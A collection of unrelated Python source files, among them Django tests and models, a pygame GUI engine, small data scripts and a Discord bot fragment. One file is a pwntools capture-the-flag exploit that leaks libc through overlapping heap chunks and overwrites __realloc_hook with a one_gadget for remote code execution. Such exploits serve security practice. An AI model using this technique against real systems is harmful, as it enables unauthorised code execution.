target = now.replace(hour=12, minute=0, second=0, microsecond=0) + datetime.timedelta(days=1)
return (target - now).total_seconds()
else:
return 0
async def check_birthdays(bot):
print(f'checking birthdays {datetime.datetime.utcnow()}')
utils.write_property('last_birthday_check', datetime.datetime.utcnow().strftime('%Y-%m-%d'))
session = database.new_session()
users = session.query(database.User).filter(database.User.birthdate.isnot(None)).all()
today = datetime.datetime.utcnow().strftime('%Y-%m-%d')
for user in users:
if user.birthdate[4:] == today[4:]:
if user.discord_id not in shared.birthday_blacklist:
if utils.is_birthdate_valid(user.birthdate):
await wish_birthday(bot, user)
async def wish_birthday(bot, user):
general = bot.get_channel(shared.general_channel)
message = f'Happy birthday <@{user.discord_id}>! {shared.emote_tada}{shared.emote_tada}{shared.emote_tada}'
await bot.send_message(general, message)
class Birthday:
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True)
@checks.is_owner()
async def birthday(self, ctx):
await ctx.bot.add_reaction(ctx.message, shared.reaction_ok)
await check_birthdays(ctx.bot)
@commands.command(pass_context=True)
@checks.is_owner()
async def birthdaytime(self, ctx):
await ctx.bot.say(f'Seconds until next check: {int(time_until_next_birthday())}')
def setup(bot):
bot.add_cog(Birthday(bot)) |
from datetime import date
from django.db import IntegrityError
from django.urls import reverse
import django_comments
from fiscal.forms import MemberForm
from workshops.models import Member, MemberRole, Membership
from workshops.tests.base import TestBase
CommentModel = django_comments.get_model()
class MembershipTestMixin:
def setUpMembership(self, consortium: bool):
self.membership = Membership.objects.create(
name="Test Membership",
consortium=consortium,
public_status="public",
variant="partner",
agreement_start="2021-02-14",
agreement_end="2022-02-14",
contribution_type="financial",
public_instructor_training_seats=0,
additional_public_instructor_training_seats=0,
)
self.member_role = MemberRole.objects.first()
class TestMemberFormLayout(TestBase):
def test_main_helper_layout(self):
form = MemberForm()
self.assertEqual(
list(form.helper.layout),
["membership", "organization", "role", "EDITABLE", "id", "DELETE"],
)
def test_empty_helper_layout(self):
form = MemberForm()
self.assertEqual(len(form.helper_empty_form.layout), 5)
self.assertEqual(
list(form.helper_empty_form.layout)[:-1],
["membership", "organization", "role", "id"],
)
self.assertEqual(form.helper_empty_form.layout[-1].fields, ["DELETE"])
class TestMembershipMembers(MembershipTestMixin, TestBase):
def setUp(self):
super().setUp()
self._setUpUsersAndLogin()
def test_adding_new_member_to_nonconsortium(self):
"""Ensure only 1 member can be added to non-consortium membership."""
self.setUpMembership(consortium=False)
self.assertEqual(self.membership.member_set.count(), 0)
# only 1 member allowed
data = {
"form-TOTAL_FORMS": 1,
"form-INITIAL_FORMS": 0,
"form-MIN_NUM_FORMS": 0,
"form-MAX_NUM_FORMS": 1000,
"form-0-membership": self.membership.pk,
"form-0-organization": self.org_alpha.pk,
"form-0-role": self.member_role.pk,
"form-0-id": "",
"form-0-EDITABLE": True,
}
response = self.client.post(
reverse("membership_members", args=[self.membership.pk]),
data=data,
follow=True,
)
self.assertRedirects(
response, reverse("membership_details", args=[self.membership.pk])
)
self.assertEqual(self.membership.member_set.count(), 1)
self.assertEqual(list(self.membership.organizations.all()), [self.org_alpha])
# posting this will fail because only 1 form in the formset is allowed
data = {
"form-TOTAL_FORMS": 2,
"form-INITIAL_FORMS": 0,
"form-MIN_NUM_FORMS": 0,
"form-MAX_NUM_FORMS": 1000,
"form-0-membership": "",
"form-0-organization": self.org_alpha.pk,
"form-0-role": self.member_role.pk,
"form-0-id": "",
"form-0-EDITABLE": True,
"form-1-membership": "",
"form-1-organization": self.org_beta.pk,
"form-1-role": self.member_role.pk,
"form-1-id": "",
"form-1-EDITABLE": True,
}
response = self.client.post(
reverse("membership_members", args=[self.membership.pk]),
data=data,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.membership.member_set.count(), 1) # number didn't change
def test_adding_new_members_to_consortium(self):
"""Ensure 1+ members can be added to consortium membership."""
self.setUpMembership(consortium=True)
self.assertEqual(self.membership.member_set.count(), 0)
data = {
"form-TOTAL_FORMS": 2,
"form-INITIAL_FORMS": 0,
"form-MIN_NUM_FORMS": 0,
"form-MAX_NUM_FORMS": 1000,
"form-0-membership": self.membership.pk,
"form-0-organization": self.org_alpha.pk,
"form-0-role": self.member_role.pk,
"form-0-id": "",
"form-0-EDITABLE": True,
"form-1-membership": self.membership.pk,
"form-1-organization": self.org_beta.pk,
"form-1-role": self.member_role.pk,
"form-1-id": "",
"form-1-EDITABLE": True,
}
response = self.client.post(
reverse("membership_members", args=[self.membership.pk]),
data=data,
follow=True,
)
self.assertRedirects(
response, reverse("membership_details", args=[self.membership.pk])
)
self.assertEqual(self.membership.member_set.count(), 2)
self.assertEqual(
list(self.membership.organizations.all()), [self.org_alpha, self.org_beta]
)
def test_removing_members_from_nonconsortium(self):
"""Ensure removing the only member from non-consortium membership is not
allowed."""
self.setUpMembership(consortium=False)
m1 = Member.objects.create(
organization=self.org_alpha,
membership=self.membership,
role=self.member_role,
)
data = {
"form-TOTAL_FORMS": 1,
"form-INITIAL_FORMS": 1,
"form-MIN_NUM_FORMS": 0,
"form-MAX_NUM_FORMS": 1000,
"form-0-membership": "",
"form-0-organization": m1.organization.pk,
"form-0-role": m1.role.pk,
"form-0-id": m1.pk,
"form-0-EDITABLE": True,
"form-0-DELETE": "on",
}
response = self.client.post(
reverse("membership_members", args=[self.membership.pk]),
data=data,
follow=True,
)
self.assertEqual(response.status_code, 200) # response failed
self.assertEqual(list(self.membership.organizations.all()), [self.org_alpha])
def test_removing_members_from_consortium(self):
"""Ensure removing all members from consortium membership is allowed."""
self.setUpMembership(consortium=True)
m1 = Member.objects.create(
organization=self.org_alpha,
membership=self.membership,
role=self.member_role,
)
m2 = Member.objects.create(
organization=self.org_beta,
membership=self.membership,
role=self.member_role,
)
data = {
"form-TOTAL_FORMS": 2,
"form-INITIAL_FORMS": 2,
"form-MIN_NUM_FORMS": 0,
"form-MAX_NUM_FORMS": 1000,
"form-0-membership": "",
"form-0-organization": m1.organization.pk,
"form-0-role": m1.role.pk,
"form-0-id": m1.pk,
"form-0-EDITABLE": True,
"form-0-DELETE": "on",
"form-1-membership": "",
"form-1-organization": m2.organization.pk,
"form-1-role": m2.role.pk,
"form-1-id": m2.pk,
"form-1-EDITABLE": True,
"form-1-DELETE": "on",
}
response = self.client.post(
reverse("membership_members", args=[self.membership.pk]),
data=data,
follow=True,
)
self.assertRedirects(
response, reverse("membership_details", args=[self.membership.pk])
)
self.assertEqual(list(self.membership.organizations.all()), [])
def test_mix_adding_removing_members_from_consortium(self):
"""Ensure a mixed-content formset for consortium membership members works
fine (e.g. a new member is added, and an old one is removed)."""
self.setUpMembership(consortium=True)
m1 = Member.objects.create(
organization=self.org_alpha,
membership=self.membership,
role=self.member_role,
)
data = {
"form-TOTAL_FORMS": 2,
"form-INITIAL_FORMS": 1,
"form-MIN_NUM_FORMS": 0,
"form-MAX_NUM_FORMS": 1000,
"form-0-membership": self.membership.pk,
"form-0-organization": m1.organization.pk,
"form-0-role": m1.role.pk,
"form-0-id": m1.pk,
"form-0-EDITABLE": True,
"form-0-DELETE": "on",
"form-1-membership": self.membership.pk,
"form-1-organization": self.org_beta.pk,
"form-1-role": self.member_role.pk,
"form-1-id": "",
"form-1-EDITABLE": True,
}
response = self.client.post(
reverse("membership_members", args=[self.membership.pk]),
data=data,
follow=True,
)
self.assertRedirects(
response, reverse("membership_details", args=[self.membership.pk])
)
self.assertEqual(list(self.membership.organizations.all()), [self.org_beta])
def test_editing_noneditable_members_fails(self):
"""Ensure an attempt to edit member without 'editable' checkbox ticked off
fails with validation error."""
self.setUpMembership(consortium=True)
m1 = Member.objects.create(
organization=self.org_alpha,
membership=self.membership,
role=self.member_role,
)
data = {
"form-TOTAL_FORMS": 1,
"form-INITIAL_FORMS": 1,
"form-MIN_NUM_FORMS": 0,
"form-MAX_NUM_FORMS": 1000,
"form-0-membership": self.membership.pk,
"form-0-organization": self.org_beta.pk,
"form-0-role": m1.role.pk,
"form-0-id": m1.pk,
}
response = self.client.post(
reverse("membership_members", args=[self.membership.pk]),
data=data,
follow=True,
)
self.assertEqual(response.status_code, 200) # form failed
self.assertEqual(
response.context["formset"].errors[0],
{"__all__": ["Form values weren't supposed to be changed."]},
)
self.assertEqual(list(self.membership.organizations.all()), [self.org_alpha])
def test_not_editing_noneditable_members_succeeds(self):
"""Ensure saving edit member without 'editable' checkbox ticked off works fine.
No changes are introduced to the member."""
self.setUpMembership(consortium=True)
m1 = Member.objects.create(
organization=self.org_alpha,
membership=self.membership,
role=self.member_role,
)
data = {
"form-TOTAL_FORMS": 1,
"form-INITIAL_FORMS": 1,
"form-MIN_NUM_FORMS": 0,
"form-MAX_NUM_FORMS": 1000,
"form-0-membership": self.membership.pk,
"form-0-organization": m1.organization.pk,
"form-0-role": m1.role.pk,
"form-0-id": m1.pk,
}
response = self.client.post(
reverse("membership_members", args=[self.membership.pk]),
data=data,
follow=True,
)
self.assertRedirects(
response, reverse("membership_details", args=[self.membership.pk])
)
self.assertEqual(list(self.membership.organizations.all()), [self.org_alpha])
def test_mix_adding_removing_members_leaves_comment(self):
"""Ensure a mixed-content formset for consortium membership members leaves
correct message in the comments."""
self.setUpMembership(consortium=True)
m1 = Member.objects.create(
organization=self.org_alpha,
membership=self.membership,
role=self.member_role,
)
data = {
"form-TOTAL_FORMS": 2,
"form-INITIAL_FORMS": 1,
"form-MIN_NUM_FORMS": 0,
"form-MAX_NUM_FORMS": 1000,
"form-0-membership": self.membership.pk,
"form-0-organization": m1.organization.pk,
"form-0-role": m1.role.pk,
"form-0-id": m1.pk,
"form-0-EDITABLE": True,
"form-0-DELETE": "on", # marks org_alpha member for removal
"form-1-membership": self.membership.pk,
"form-1-organization": self.org_beta.pk,
"form-1-role": self.member_role.pk,
"form-1-id": "", # no ID, so a new member for org_beta will be created
"form-1-EDITABLE": True,
}
response = self.client.post(
reverse("membership_members", args=[self.membership.pk]),
data=data,
follow=True,
)
self.assertRedirects(
response, reverse("membership_details", args=[self.membership.pk])
)
comment = CommentModel.objects.first()
self.assertEqual(
comment.comment,
f"""Changed members on {date.today():%Y-%m-%d}:
* Added Beta Organization <beta.com>
* Removed Alpha Organization <alpha.edu>""",
)
class TestMemberUnique(MembershipTestMixin, TestBase):
def test_duplicate_members_with_the_same_role_fail(self):
"""Duplicate Member & Role should fail for given membership."""
# Arrange
self.setUpMembership(consortium=True)
member1 = Member(
organization=self.org_alpha,
membership=self.membership,
role=self.member_role,
)
member2 = Member(
organization=self.org_alpha,
membership=self.membership,
role=self.member_role,
)
# Act
member1.save()
# Assert
with self.assertRaises(IntegrityError):
member2.save()
def test_distinct_members_for_the_same_membership(self):
"""Distinct Member & Role should work for given membership."""
# Arrange
self.setUpMembership(consortium=True)
member1 = Member(
organization=self.org_alpha,
membership=self.membership,
role=self.member_role,
)
member2 = Member(
organization=self.org_beta,
membership=self.membership,
role=self.member_role,
)
member3 = Member(
organization=self.org_alpha,
membership=self.membership,
role=MemberRole.objects.last(),
)
# Act & Assert
member1.save()
member2.save()
member3.save()
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
'''Copyright (C) 2018, Nudt, JingshengTang, All Rights Reserved
#Author: Jingsheng Tang
#Email: mrtang@nudt.edu.cn
# This gui program employs the vertical synchronization mode on the basis of using the directx
# graphic driver. It makes the program update the drawing synchornously with the monitor, thus
# to accurately contorl the stimulus graphics. It is similar to the sychtoolbox of Matlab. On
# this basis, the stimulus marker event is also set synchronously with the actual drawing.
# Since the vertical synchronization mode is used, the graphic user interface is fullscreen.
update: 2019/5/23
'''
import pygame
from pygame.locals import *
# 批量导入支持的模块,允许扩展
from modules import MY_MODULES
MODULES = {}
for script in MY_MODULES:
# eg. from block import Block
# eg. the Block is callable by MODULES['Block']
exec('from %s import %s'%(script,MY_MODULES[script]),MODULES)
from multiprocessing import Queue,Event
import multiprocessing
import threading
import time,math
import os,platform
import numpy as np
from rz_global_clock import global_clock
from marker import Marker
SCREEN_SYNC = False
# 垂直同步设置,仅支持windows
OS = platform.system().lower()
if OS == 'windows':
try:
os.putenv('SDL_VIDEODRIVER','directx')
os.environ['SDL_VIDEODRIVER'] = 'directx'
SCREEN_SYNC = True
except: raise KeyError('add an environment variable "SDL_VIDEODRIVER" with value of "directx" into the computer')
import win32api,win32con
SCRW = win32api.GetSystemMetrics(win32con.SM_CXSCREEN)
SCRH = win32api.GetSystemMetrics(win32con.SM_CYSCREEN)
elif OS == 'linux':
pass
else:
raise IOError('unrecognized system platform')
# 由于在windows下基于multiprocessing.process实现多进程类并不安全,因此将显式启动多进程函数
# 主进程与子进程采用queue和event通信,但是提供接口类,用来封装直接对queue和event的操作
layout = {'screen':{'size':(200,200),'color':(0,0,0),'type':'normal',
'Fps':60,'caption':'this is an example'},
'cue':{'class':'sinBlock','parm':{'size':(100,100),'position':(100,100),
'frequency':13,'visible':True,'start':False}}}
def guiengine_proc(args):
layout = args['layout']
Q_c2g = args['Q_c2g']
E_g2c = args['E_g2c']
saddress = args['server_address']
gui = GuiEngine(layout, Q_c2g, E_g2c, saddress)
gui.StartRun()
class GuiIF(): #用于向guiengine发射信号
def __init__(self,server_address = None,layout = layout):
# Q_c2g:传递内容
# 1. 单字符串:'_q_u_i_t_' -> 结束标志
# 2. 列表:[stimulus setting, marker] -> 刺激设置,marker标志
self.Q_c2g = Queue()
self.E_g2c = Event()
self.layout = layout
self.args = {'layout':self.layout,'Q_c2g':self.Q_c2g,'E_g2c':self.E_g2c,'server_address':server_address}
def quit(self):
self.Q_c2g.put('_q_u_i_t_')
def wait(self):
self.E_g2c.wait()
def update(self,stimulus,marker):
self.Q_c2g.put([stimulus,marker])
class GuiEngine():
stimuli = {}
__release_ID_list = []
def __init__(self,stims,Q_c2g,E_g2c,server_address):
"""
stims: dict to define a stimulus.
eg. stims = {'cue':{'class':'Block','parm':{'size':(100,40),'position':(0,0)}}}
Q_c2g: multiprocessing.Queue, used for accepting stimulus control command from core process
kwargs: server_address = ?, the target server's address to accept marker
property for describe screen
size: (width,height)
type: fullscreen/normal
frameless: True/False
color: (R,G,B)
caption: string
Fps: int, strongly suggest you set Fps as the same with system's Fps
"""
self.Q_c2g = Q_c2g
self.E_g2c = E_g2c
self.marker_on = False
self.marker_event = {}
self.stp = False
self.lock = threading.Lock()
pygame.init()
#初始化screen
# 当且仅当window环境变量设置成功且fullscreen时,SCREEN_SYNC=True
if stims['screen']['type'].lower() == 'fullscreen':
self.screen = pygame.display.set_mode((0,0),FULLSCREEN | DOUBLEBUF | HWSURFACE,32)
else:
# 将窗口置中
if OS == 'windows':
w,h = stims['screen']['size']
x = int((SCRW - w)/2.)
y = int((SCRH - 50 - h)/2.) - 50 # 扣除任务栏高度
os.environ['SDL_VIDEO_WINDOW_POS'] = '%i,%i'%(x,y)
self.screen = pygame.display.set_mode(stims['screen']['size'], NOFRAME | DOUBLEBUF, 32)
SCREEN_SYNC = False
self.screen_color = stims['screen']['color']
self.screen.fill(self.screen_color)
pygame.display.set_caption(stims['screen']['caption'])
self.Fps = stims['screen']['Fps']
del stims['screen']
self.ask_4_update_gui = False #线程接收到刷新请求后,通知主进程刷新
self.update_in_this_frame = False #主进程在一帧真实的刷新帧中确定能够进行刷新
self.__update_per_frame_list = [] #接受帧刷新对象
if server_address is None:
class Marker():
def __init__(self,sa):
pass
def send_marker(self,marker):
raise Exception('marker_sender was not initilized because server_address parameter was not given')
self.marker_sender = Marker(server_address)
#注册刺激,生成实例
for ID in stims:
element = stims[ID]
clas = element['class']
if clas in MODULES:
self.stimuli[ID] = MODULES[clas](self.screen,**element['parm'])
backthread = threading.Thread(target = self.backthreadfun, args = (), daemon = True)
backthread.start()
def backthreadfun(self): #接收刷新请求字典
# arg = self.Q_c2g.get()
# arg可能的形式:
# 1. 单字符串:'_q_u_i_t_' -> 结束标志
# 2. 列表:[stimulus setting, marker] -> 刺激设置,marker标志
# 3. marker: eg. {'mkr1':{'value':[0]}}
while True:
arg = self.Q_c2g.get()
if arg == '_q_u_i_t_':
self.stp = True #用于终止主程序
break
stimulus_arg,self.marker_event = arg #marker is a dict
self.lock.acquire()
[self.stimuli[id].reset(**stimulus_arg[id]) for id in stimulus_arg] #更新刺激实例的参数
self.ask_4_update_gui = True #请求刷新
self.lock.release()
print('[guiengine] sub thread ended')
def StartRun(self):
print('[guiengine] process started')
self.E_g2c.set()
clock = pygame.time.Clock()
# END = 0
while True:
self.screen.fill(self.screen_color)
if self.ask_4_update_gui: #子线程请求刷新
self.update_in_this_frame = True #将在这一帧刷新
self.ask_4_update_gui = False
#.items()方法将stimuli字典转换为列表,元素为元祖,k[0]对应ID, k[1]为具体的刺激对象实例
# 意思是按照layer属性排序
stis = sorted(self.stimuli.items(),key=lambda k:k[1].layer)
[s[1].show() for s in stis] #按照图层书序顺序绘图,layer越大,越顶层
pygame.display.flip() #该帧刷新完毕
if not SCREEN_SYNC: clock.tick(self.Fps)
# 有刷新请求,且在该帧完成了刷新
if self.update_in_this_frame:
_clk = global_clock()
if len(self.marker_event)>0: #确实接受到了marker
for ky in self.marker_event: # 将时间戳记录下来
self.marker_event[ky]['timestamp'] = _clk
self.marker_sender.send_marker(self.marker_event)
self.update_in_this_frame = False
pygame.event.get()
if self.stp: break #只能通过主控结束
pygame.quit()
[self.stimuli[id].release() for id in self.stimuli] #更新刺激实例的参数
print('[guiengine] process exit')
if __name__ == '__main__':
gui = GuiIF() # 建立与GUI交互的接口
_ = multiprocessing.Process(target = guiengine_proc,args = (gui.args,)) # 新建进程启动GUI
_.start()
gui.wait() # 等待GUI启动
time.sleep(1)
gui.update({'cue':{'start':True}},{}) # 更新GUI且发送marker
time.sleep(1)
gui.update({'cue': {'start': False}},{}) # 更新GUI且发送marker
time.sleep(1)
gui.quit()
|
# -*- coding:utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class College(models.Model):
title = models.CharField(u'标题', max_length=500)
show = models.BooleanField(u'是否发布', default=False)
time = models.DateField(u'发布时间', auto_now_add=True)
click = models.IntegerField(u'点击次数', editable=False,default=0)
content = models.TextField(u'正文')
url_name = models.CharField(u'url', editable=False, default='college', max_length=500)
class Meta:
ordering = ['-time']
verbose_name_plural = u'学院概况'
verbose_name = u'文章'
def __unicode__(self):
return u'%s' %self.title
class Faculty(models.Model):
title = models.CharField(u'标题', max_length=500)
show = models.BooleanField(u'是否发布', default=False)
time = models.DateField(u'发布时间', auto_now_add=True)
content = models.TextField(u'正文')
click = models.IntegerField(u'点击次数', editable=False,default=0)
url_name = models.CharField(u'url', editable=False, default='faculty', max_length=500)
class Meta:
ordering = ['-time']
verbose_name_plural = u'师资队伍'
verbose_name = u'文章'
def __unicode__(self):
return u'%s' %self.title
class Recruit(models.Model):
title = models.CharField(u'标题', max_length=500)
show = models.BooleanField(u'是否发布', default=False)
time = models.DateField(u'发布时间', auto_now_add=True)
content = models.TextField(u'正文')
click = models.IntegerField(u'点击次数', editable=False,default=0)
url_name = models.CharField(u'url', editable=False, default='recruit', max_length=500)
class Meta:
ordering = ['-time']
verbose_name_plural = u'招生动态'
verbose_name = u'文章'
def __unicode__(self):
return u'%s' %self.title
class News(models.Model):
title = models.CharField(u'标题', max_length=500)
show = models.BooleanField(u'是否发布', default=False)
time = models.DateField(u'发布时间', auto_now_add=True)
content = models.TextField(u'正文')
click = models.IntegerField(u'点击次数', editable=False,default=0)
url_name = models.CharField(u'url', editable=False, default='news', max_length=500)
class Meta:
ordering = ['-time']
verbose_name_plural = u'新闻动态'
verbose_name = u'文章'
def __unicode__(self):
return u'%s' %self.title
class Notice(models.Model):
title = models.CharField(u'标题', max_length=500)
show = models.BooleanField(u'是否发布', default=False)
time = models.DateField(u'发布时间', auto_now_add=True)
content = models.TextField(u'正文')
click = models.IntegerField(u'点击次数', editable=False,default=0)
url_name = models.CharField(u'url', editable=False, default='notice', max_length=500)
class Meta:
ordering = ['-time']
verbose_name_plural = u'通知公告'
verbose_name = u'通知'
def __unicode__(self):
return u'%s' %self.title
class CourseWare(models.Model):
title = models.CharField(u'课件名称', max_length=500)
time = models.DateField(u'发布时间', auto_now_add=True)
course = models.FileField(u'课件',upload_to='media')
show = models.BooleanField(u'是否发布', default=False)
author=models.ForeignKey(User,editable=False)
click = models.IntegerField(u'点击次数', editable=False,default=0)
url_name = models.CharField(u'url', editable=False, default='courseware', max_length=500)
class Meta:
ordering = ['-time']
verbose_name_plural = u'课件'
verbose_name = u'课件'
def __unicode__(self):
return u'%s' %self.title
class International(models.Model):
title = models.CharField(u'标题', max_length=500)
show = models.BooleanField(u'是否发布', default=False)
time = models.DateField(u'发布时间', auto_now_add=True)
content = models.TextField(u'正文')
click = models.IntegerField(u'点击次数', editable=False,default=0)
url_name = models.CharField(u'url', editable=False, default='communication', max_length=500)
class Meta:
ordering = ['-time']
verbose_name_plural = u'国际交流'
verbose_name = u'文章'
def __unicode__(self):
return u'%s' %self.title
class Rule(models.Model):
title = models.CharField(u'标题', max_length=500)
show = models.BooleanField(u'是否发布', default=False)
time = models.DateField(u'发布时间', auto_now_add=True)
content = models.TextField(u'正文')
click = models.IntegerField(u'点击次数', editable=False,default=0)
url_name = models.CharField(u'url', editable=False, default='rule', max_length=500)
class Meta:
ordering = ['-time']
verbose_name_plural = u'规章制度'
verbose_name = u'文章'
def __unicode__(self):
return u'%s' %self.title
class Employment(models.Model):
title = models.CharField(u'标题', max_length=500)
show = models.BooleanField(u'是否发布', default=False)
time = models.DateField(u'发布时间', auto_now_add=True)
content = models.TextField(u'正文')
click = models.IntegerField(u'点击次数', editable=False,default=0)
url_name = models.CharField(u'url', editable=False, default='employment', max_length=500)
class Meta:
ordering = ['-time']
verbose_name_plural = u'就业信息'
verbose_name = u'文章'
def __unicode__(self):
return u'%s' %self.title
class Link(models.Model):
title = models.CharField(u'标题', max_length=500)
image = models.CharField(u'logo图片链接', max_length=500)
url = models.CharField(u'链接', max_length=500)
show = models.BooleanField(u'是否发布', default=False)
time = models.DateField(u'发布时间', auto_now_add=True)
click = models.IntegerField(u'点击次数', editable=False,default=0)
url_name = models.CharField(u'url', editable=False, default='link', max_length=500)
class Meta:
ordering = ['-time']
verbose_name_plural = u'友情链接'
verbose_name = u'链接'
def __unicode__(self):
return u'%s' %self.title |
from random import randint
jogos = []
aposta = []
quant = int(input('Gerar quantos jogos? '))
while len(jogos) != quant:
while True:
num = randint(1, 60)
if num not in aposta:
aposta.append(num)
if len(aposta) == 6:
break
jogos.append(aposta[:])
aposta.clear()
print(jogos)
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
local = 0
link = '159.138.137.79:65267'
host,port = map(str.strip, link.split(':')) if link != '' else ("",0)
context.log_level = 'debug'
#context.terminal = "/home/noone/hyperpwn/hyperpwn-client.sh"
context.terminal = ['mate-terminal','--geometry=94x60--10-26','--hide-menubar', '-x','sh','-c',]
exe = './timu'
context.binary = exe
elf = ELF(exe)
libc = elf.libc
#don't forget to change it
if local:
io = process(exe)
else:
io = remote(host,port)
s = lambda data : io.send(str(data))
sa = lambda delim,data : io.sendafter(str(delim), str(data))
sl = lambda data : io.sendline(str(data))
sla = lambda delim,data : io.sendlineafter(str(delim), str(data))
r = lambda numb=4096 : io.recv(numb)
rl = lambda : io.recvline().strip()
ru = lambda delim,drop=True : io.recvuntil(delim, drop)
rg = lambda regex : io.recvregex(regex)
rp = lambda timeout=1 : io.recvrepeat(timeout)
uu32 = lambda data : u32(data.ljust(4, '\x00'))
uu64 = lambda data : u64(data.ljust(8, '\x00'))
lg = lambda s,addr : io.success('\033[1;31;40m%20s--> 0x%x\033[0m'%(s,addr))
ga = lambda job="" : gdb.attach(io, job) if local else 0
ia = lambda : io.interactive()
# break on aim addr
def debug(addr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16)
gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
else:
gdb.attach(io,"b *{}".format(hex(addr)))
# get_one_gadget
def get_one_gadget(filename):
try:
import subprocess
except Exception as e:
print("subprocess not install")
exit(0)
return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
def choice(idx):
def wrap(f):
def go(*args, **kargs):
sla(" :\n", idx)
f(*args, **kargs)
return go
return wrap
@choice(idx=1)
def new(size, content):
sla(": \n", size)
sla(": \n", content)
@choice(idx=2)
def delete(idx):
sla(": \n", idx)
@choice(idx=3)
def show():
pass
def exp(host, rce=False):
if rce:
one_gadget = get_one_gadget(libc.path)
new(0xf8, "A") #0
new(0x18, "A") #1
new(0x68, "A") #2
new(0xf8, "A") #3
new(0x68, "A") #4
new(0x18, "A") #5
delete(2)
new(0x68, "A"*0x60 + p64(0x20+0x70+0x100)) #2
delete(0)
delete(3)
new(0xf8, "A") #0
show()
ru("1 : ")
libc.address = uu64(r(6)) - 0x3c4b78
lg("libc", libc.address)
delete(4)
delete(2)
new(0x48, "A"*0x10 + p64(0) + p64(0x71) + p64(libc.sym['__realloc_hook']-0x1b))
new(0x68, "A")
new(0x68, "A"*0xb + p64(libc.address + one_gadget[1]) + p64(libc.sym['realloc']+2))
#new(0x68, "A"*0xb + p64(libc.address + one_gadget[0]) + p64(0xAAAAAAAA))
sl("1")
sl("1")
#ga()
'''
try:
from LibcSearcher import *
except Exception as e:
print("LibcSearcher not install")
exit(0)
obj = LibcSearcher("fgets",leak_addr)
libc_base = leak_addr - obj.dump("fgets")
system_addr = libc_base + obj.dump("system")
malloc_hook = libc_base + obj.dump("__malloc_hook")
free_hook = libc_base + obj.dump("__free_hook")
bin_sh_addr = libc_base + obj.dump("str_bin_sh")
'''
ia()
if __name__ == '__main__':
exp(host,True)
|
import cv2
import numpy as np
print("Package Imported")
img = cv2.imread('E:\Python Project\Resources\car.jpg')
cv2.imshow("car", img)
cv2.waitKey(0)
cv2.destroyAllWindows() |
import pandas as pd
import pymongo
import time
from sqlalchemy import create_engine
client =pymongo.MongoClient("my_mongodb")
db = client.infobvg
collection = db.koepenick
time.sleep(10)
entries = collection.find()
pg = create_engine('postgresql://postgres:1234@my_postgres:5432/my_bvg_data', echo=True)
pg.execute('''
CREATE TABLE IF NOT EXISTS s_koepenick_timetable (
running_time VARCHAR,
delay VARCHAR,
type VARCHAR,
number VARCHAR,
direction VARCHAR,
name VARCHAR,
mode VARCHAR
);
''')
for entry in entries:
running_time = entry['when']
delay = entry['delay']
type = entry['line']['type']
number = entry['line']['fahrtNr']
direction = entry['direction']
name = entry['line']['name']
mode = entry['line']['mode']
query = "INSERT INTO s_koepenick_timetable VALUES (%s, %s, %s, %s, %s, %s, %s);"
pg.execute(query, (running_time, delay, type, number, direction, name, mode))
# Cleaning the data in the table
clean1_query = "ALTER TABLE s_koepenick_timetable ALTER COLUMN running_time TYPE TIMESTAMP WITHOUT TIME ZONE USING running_time::timestamp without time zone"
clean2_query = "ALTER TABLE s_koepenick_timetable ALTER COLUMN delay TYPE INT USING delay::integer"
pg.execute(clean1_query)
pg.execute(clean2_query)
|
import os.path
from lsst.utils import getPackageDir
config.load(os.path.join(getPackageDir("obs_subaru"), "config", "hsc", "isr.py"))
from lsst.obs.hsc.detrends import HscFlatCombineTask
config.combination.retarget(HscFlatCombineTask)
config.combination.load(os.path.join(os.environ['OBS_SUBARU_DIR'], 'config', 'hsc', 'vignette.py'))
|
# -*- coding: utf-8 -*-
import json
from django.http import Http404
from django.core.serializers.json import DjangoJSONEncoder
from django.shortcuts import (
HttpResponse, redirect, render_to_response, RequestContext
)
from django.views.decorators.http import require_POST
from django.contrib.auth.decorators import login_required
from sorl.thumbnail import get_thumbnail
from photologue.models import Gallery
@login_required
def ajax_get_list_gallery(request):
json_data = dict(succes=False, gallery=[])
for gallery in Gallery.objects.all():
try:
im = get_thumbnail(
gallery.public()[0].image,
'100x100', crop='center', quality=99
)
data = dict(
title=gallery.title,
id=gallery.id,
tags=gallery.tags,
created=gallery.date_added,
cover=im.url
)
except (IndexError, AttributeError):
pass
else:
json_data['gallery'].append(data)
json_data['success'] = True
return HttpResponse(json.dumps(json_data, cls=DjangoJSONEncoder))
def ajax_get_gallery(request, gallery_id):
json_data = {
'success': False,
"photos": [],
}
try:
gallery = Gallery.objects.get(pk=gallery_id)
except Gallery.DoesNotExist:
raise Http404
for photo in gallery.photos.all():
im = get_thumbnail(photo.image, '1000', crop='center', quality=99)
if photo.caption:
json_data['photos'].append(
{'image': im.url, 'caption': photo.caption}
)
else:
json_data['photos'].append({'image': im.url})
json_data['success'] = True
return HttpResponse(json.dumps(json_data, cls=DjangoJSONEncoder))
|
#Copyright (C) 2016 Paolo Galeone <nessuno@nerdz.eu>
#
#This Source Code Form is subject to the terms of the Mozilla Public
#License, v. 2.0. If a copy of the MPL was not distributed with this
#file, you can obtain one at http://mozilla.org/MPL/2.0/.
#Exhibit B is not attached; this software is compatible with the
#licenses expressed under Section 1.12 of the MPL v2.
"""Define the interface to implement to work with Autoencoders"""
from abc import ABCMeta, abstractmethod
class Autoencoder(object, metaclass=ABCMeta):
"""Autoencoder is the interface that classifiers must implement"""
@abstractmethod
def get(self, images, train_phase=False, l2_penalty=0.0):
""" define the model with its inputs.
Use this function to define the model in training and when exporting the model
in the protobuf format.
Args:
images: model input
train_phase: set it to True when defining the model, during train
l2_penalty: float value, weight decay (l2) penalty
Returns:
is_training_: tf.bool placeholder enable/disable training ops at run time
predictions: the model output
"""
@abstractmethod
def loss(self, predictions, real_values):
"""Return the loss operation between predictions and real_values
Args:
predictions: predicted values
labels: real_values
Returns:
Loss tensor of type float.
"""
|
#!/apps/anaconda/anaconda-2.0.1/bin/python
from params import *
